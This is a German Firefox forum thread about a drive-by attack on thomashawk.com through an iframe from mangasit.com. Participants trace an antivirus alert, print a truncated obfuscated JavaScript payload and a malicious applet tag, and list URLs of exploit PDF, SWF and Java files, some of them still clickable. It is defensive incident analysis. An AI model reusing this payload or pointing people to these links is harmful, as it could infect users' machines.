FF ruft im Hintergrund virenbefallene Seite auf

  • Das iframe steht immer noch auf mangasit - immer noch ohne Inhalt.
    Warum mault Avast rum? Sind wird noch bei Firefox?
    Falls ja, warum und was hat der Rest der Seite in sich?
    Da mangasit ja keinerlei Daten liefert, gibt es auch nichts zu prüfen.
    Was und wo also hat Avast?
    Firefox möchte Java haben, nutze ich nicht, ist nicht mal installiert.
    Eine Ursache?

    PS prefetch war schon immer aus!

    PPS Eset hat keine Ausnahme auf den Firefox-Cache und auch sonst
    keinerlei Warnungen von Malware Defender bzgl Übergriffen.

  • Wenn das Problem nur über das Prefetching auftritt, wie Nighthawk und Roady berichten, dann ist zu vermuten, dass der auslösende iframe in einer anderen Seite steht, als die wir aktuell geprüft haben. Insofern muss es nicht das mangasit sein. Das kann auch über irgendwelche Google-Ads oder sonst extern verlinkte Seiten passieren. Daher vermute ich auch, dass thomashawk nicht verseucht ist, sondern eine Seite die von dort verlinkt ist (und da Werbung z.B. rotiert, kann es auch dazu führen, dass der Alarm nur sporadisch anschlägt). Zumindest würde das erklären, warum bei Firefox Alarm geschlagen wird, während Opera unbehelligt bleibt.

    Wenn es wirklich über Prefetching zu dem Vorfall kommt, kann man aber Entwarnung geben. Die Seiten die Firefox vorab schon mal herunterlädt, landen direkt im Cache. Der ist verschlossen und die HTML-Seite wird auch nicht geparset, also gelesen. Die Seite wird erst dann aus dem Cache geladen und ausgeführt/angezeigt, wenn der Benutzer die Seite regulär aufruft. Erst dann kann auch Schadecode, sofern vorhanden, ausgeführt werden. Einzig was nervt, ist wahrscheinlich das Popup von Avast! Damit muss man entweder leben, oder das Prefetching deaktivieren.

  • Zitat von .Ulli

    Könntest du bitte auch das Password verraten ?

    hab es dir per PM geschickt

  • Zitat von Wawuschel

    hab es dir per PM geschickt

    Danke, kam an und habe die Datei gleich als Referenz benutzt.

    Den doppelten <iframe ../> am Ende nach </html> gelöscht und VirusTotal vorgeworfen, das Ergebnis siehe hier http://www.virustotal.com/de/analisis/ce…aa14-1263752468

    Da waren es statt 12 nur noch 5 Funde - was ich jetzt nicht kommentieren werde.

    Zum Thema Prefetching hat Mozilla ja auch eine eigene Meinung, siehe Link prefetching FAQ. Auf besagter Webseite ist aber kein Link derart ausgezeichnet.

  • Die Meldung dürfte sich durchaus auf den eingebundenen IFrame von mangasit.com beziehen. Dort erhalte ich folgenden obfuskierten JS-Code:

    Code
    <script language="JavaScript" type="text/javascript">this.uP='';var wPM;var fW;if(fW!='nSZ' && fW!='lA'){fW='nSZ'};var aN;if(aN!='vS' && aN!='eBG'){aN='vS'};wPM="37333337343d3233781b072911097968203d287a276434206d0e176b176c7f1a6f176603387c370f6b312d3c21782c3d160f0f1a3248362a382126332324133632246c3a2a39263533042b1f373d2b037e643f2324273907476a7e322719"+"121401180b4f2c736b7544322f2c2d3f1f2d0873602e26207d70793c742a3a761c2e7d336b67282f2d0313051c1f7e7d3226731a3f2f0b313e0b241f6f7c3238292a3a737e5e7b4563626829353b0707030f076e722a2426002770393a23"+"2f056429276f6d2c3c362f717b7f756...
    (gekürzt)

    Schon allein die Verwendung solcher Verschleierungen führt i.d.R. zur Erkennung durch Scanner, wenn auch oftmals nur generisch und auf Verdacht. In dem Fall aber erzeugt der Code mindestens ein Java-Applet:

    Code
    <applet code="evilTook.class" id="youAsIsnt" name="youAsIsnt" height="1" width="1"></applet>

    Die class-Datei findet sich natürlich auch:
    http://mangasit.com/lib/evilTook.class

    Durch einen Decompiler gejagt und gekürzt:

    Die über jar: geladenen Datei ist:
    http://mangasit.com/lib/thatGalleyComes.php

    Für diese gilt:
    http://www.virustotal.com/analisis/4084d…a6e9-1262769915

    Aus den Beobachtungen ergibt sich hier als Fazit:
    Es handelt sich hier nicht um ein False-Positive, sondern um einen realen Angriff. Sowohl die Webpräsenzen thomashawk.com als auch mangasit.com sind als kompromittiert anzusehen (vgl. dazu http://www.google.com/safebrowsing/d…m/lib/index.php und das Einbinden von mangasit.com via IFrame auf thomashawk.com). Wie die Erkennung von einzelnen Scannern funktioniert, kann hier auch unterschiedlich sein, spielt bei der Betrachtung aber eine untergeordnete Rolle.
    Zu Untersuchen bliebe natürlich, warum das Fx-Profil die Seite aufgerufen hat. Da kein Interesse mehr an einer Untersuchung besteht, kann man das an der Stelle abbrechen. Ich vermute aber, dass das Profil nicht ausreichend bereinigt wurde.

  • Zitat von Brummelchen

    Was mir allerdings persönlich auffällt - wie kann man als Webseitengestalterin auf einem
    unsicheren Browser aufbauen? Eigentlich sollte es u.a. Aufgabe sein, auf solche Misstände
    hinzuweisen und nicht bewusst auf solche Sicherheitslücken hinzuarbeiten...!?
    [...]
    Webmaster, die so ein Element noch nutzen, gehören mMn erschlagen.

    Auch wenn man zwischen Arbeit und persönlicher Nutzung unterscheiden muss, da beim Webdesign durchaus auch veraltete Browser berücksichtigt werden, so stellte Milla dies hier als Problem bei der privaten Nutzung eines alten Fx dar. Und da ist die Kritik von Brummelchen durchaus in der Sache richtig. Wenn man es nicht schafft den Fx 3 zum Laufen zu bekommen (Gründe seien einmal dahingestellt), dann sollte man eben einen anderen Browser verwenden. Eine unsichere, alte Version ist an der Stelle keine Option und von einem Webdesigner erwarte ich persönlich so viel Vernunft! Schließlich sind diese auch für die Sicherheit von Webanwendungen zuständig und da kommen mir persönlich Zweifel an der fachlichen Eignung, wenn man privat derart schludert.

  • Zitat von NightHawk56

    Ein weiterer Hinweis: suche ich mit http://ixquick.com/ nach "thomashawk" kommt von avast trotz erlaubtem Prefetching keine Warnung.

    Da ixquicks keine prefetch-Links verwendet wie Google, wird es da auch nicht zu einer solchen Meldung kommen. Siehe dazu den Beitrag von .Ulli weiter oben.

  • Quelle: Brummelchen

    Zitat von Brummelchen

    Das iframe steht immer noch auf mangasit - immer noch ohne Inhalt.
    [...]
    Firefox möchte Java haben, nutze ich nicht, ist nicht mal installiert.

    Dann scheint mir aber doch ein Inhalt dort gewesen zu sein. Oder wieso sollte Firefox denn sonst dort Java wollen?

  • Zitat von boardraider

    Dort erhalte ich folgenden obfuskierten JS-Code:

    Den ich bislang nicht sah - somit muss es an der lokalen Konstellation liegen / gelegen haben.

    Die erste Vermutung war der Proxy. Ob mit oder ohne Proxy, am Resultat 0 Byte änderte sich nichts. Bei einer neuen IP hingegen empfängt wget einmalig 6.046 Byte.

    Mein auf den 0 Byte basierender Schluss war somit falsch.

  • Durchaus nicht ungewöhnlich, dass der empfangene Datenstrom in solchen Fällen nicht stabil ist. Ist von außen auch nicht immer ersichtlich auf welchen Daten dies basiert.
    Begegnet sind mir schon Angriffsversuche, die nur einmal pro IP gestartet wurden (in einem gewissen Zeitraum). Oder auch Unterscheidungen basierend auf den HTTP-Headern (verschieden Codes je nach Browser). Im Detail habe ich mir das in dem Fall nicht angesehen, da bereits der erste Versuch ein Treffer war.

  • Zitat

    In dem Fall aber erzeugt der Code mindestens ein Java-Applet

    Ergänzung dazu:
    Das Skript scheint noch mehr Angriffsvektoren zu nutzen.
    h**p://mangasit .com/lib/normalWill.pdf Virustotal
    h**p://mangasit .com/lib/moreYou.swf Virustotal
    Auch für den IE scheint etwas dabei zu sein. Der Code selbst lässt auf ein entsprechendes Kit schließen.

    Nochmals zur deutlichen Warnung! Die Dateien sollten keinesfalls mit den vorgesehen Anwendungen geöffnet werden. Es ist durchaus möglich, dass hier 0day-Exploits zur Anwendung kommen oder vorhandene Scanner noch keine Signaturen dafür haben.

    Meldung an den Admin von thomashawk.com habe ich abgesetzt. Eine Meldung bzgl. mangasit.com erscheint mir wenig sinnvoll *eg* (Ergänzung: dem Registrar habe ich trotzdem geschrieben, allerdings sind das auch Russen, insofern...)

    Update bzgl. thomashawk.com:
    Die Seite ist nun (16:45 Uhr) offline.

  • Zitat

    Dann scheint mir aber doch ein Inhalt dort gewesen zu sein. Oder wieso sollte Firefox denn sonst dort Java wollen?


    Dann dürfte das die Quelle des Übels sein, mehr kann ich nicht vermuten.
    Das PDF nutzt den neuesten Exploit aus - das SWF beinhaltet ebenfalls einen Exploit!

  • Zitat von boardraider

    http://mangasit. com/lib/normalWill.pdf
    http://mangasit .com/lib/moreYou.swf

    Ich habe diese beiden Dateien heut Nachmittag mal ans Viruslabor von Avira geschickt.

    Zitat von Avira Lab Response


    Dateiname   |  Ergebnis 
    normalWill.pdf |  MALWARE

    Die Datei 'normalWill.pdf' wurde als 'MALWARE' eingestuft. Unsere Analytiker haben dieser Bedrohung den Namen EXP/Pdfka.axv gegeben. Bei der Bezeichnung "EXP/" handelt es sich um eine spezielle Erkennung von Sicherheitslücken, welche es einem Angreifer ermöglichen könnte, Zugriff auf das System zu erhalten.Ein Erkennungsmuster wird mit einem der nächsten Updates der Virendefinitionsdatei (VDF) hinzugefügt werden.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    @boardraider
    magst du vllt. die beiden mangasit-Links oben so gestalten das sie nicht direkt anklickbar sind.

  • @Wawuschel

    Zitat

    magst du vllt. die beiden mangasit-Links oben so gestalten das sie nicht direkt anklickbar sind.

    Das mache ich aus Prinzip nicht. Ich habe ausdrücklich eine Warnung formuliert und auch aus dem Kontext sollte es für jeden ersichtlich sein, dass man da nicht einfach drauf klicken sollte.

    Road-Runner
    Wenn du meine Postings editierst, dann schreibe bitte einen Vermerk dazu!

  • Zitat von boardraider

    @Wawuschel

    Das mache ich aus Prinzip nicht. Ich habe ausdrücklich eine Warnung formuliert und auch aus dem Kontext sollte es für jeden ersichtlich sein, dass man da nicht einfach drauf klicken sollte.

    Warnung hin oder her, solche Links gehören entschärft.

    Zitat

    Road-Runner
    Wenn du meine Postings editierst, dann schreibe bitte einen Vermerk dazu!

    Siehe meinen Beitrag über Deinem.

  • Zitat

    solche Links gehören entschärft.

    Warum soll sich jeder Interessierte umständlichen Handgriffen aussetzen? Ich sehe da 0,0 Veranlassung.

    Zitat

    Siehe meinen Beitrag über Deinem.

    So etwas wird allzu leicht übersehen. Ich bevorzuge einen Vermerk im Beitrag selbst. So viel Höflichkeit und Offenheit darf es schon sein.